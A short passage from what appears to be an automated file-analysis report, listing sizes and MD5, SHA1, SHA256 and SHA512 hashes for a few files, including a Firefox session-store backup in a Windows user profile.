SHA1d9c164beadcb54b56aa7d82d3f27e93f4d5efcef
SHA256ea30c5b559a84530768693deea1c9a8bc1d2b299007619562f4fb1dc38fe122a
SHA5121a6d1e4f931dd7bc59bf93bbadde8c248acad2a27c9e46effe54c6ded5d6f69d5eff990c1f426a8d7036c5d6f1741a1f50fe58eeed20b31cba751b22641586f2
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\p7jdwo0d.default-release\sessionstore-backups\recovery.jsonlz4
Filesize4KB
MD5219799a85707d3f741163427ae2890df
SHA141ab76829421a2e78def384e0ce6a73730ecc6ae
SHA2561cda5c7dea57f217d776c0e6ea5e206f7b29e09b100b98bdb74fc0ba9bc36f7a
SHA51221ce57917016e81d571abfbbfc60b91dcc5c90d6f843a47933d4ad4300531578872c29825a899b285141284a88b8a7abb33106b4a322cb56e32332c49971c313
-
Filesize
1KB
MD56ba5f129601ccdb9db83c09c019bcc41
SHA128ee2d24bceccb2a558f4c457c3eed7ae46dae0d
SHA2568fda1fa2f4f670ebfb0532ceec094a5543e9999d012bf1f28f496b9f6229a661
SHA512d7a9c40d25054b6f2be08c06c3801d7d716571a248aee1f5fe966a554f682d9d5308815b84f44877d00b58a078a0ee88467576acdcc04c5a365206b7fe879cb8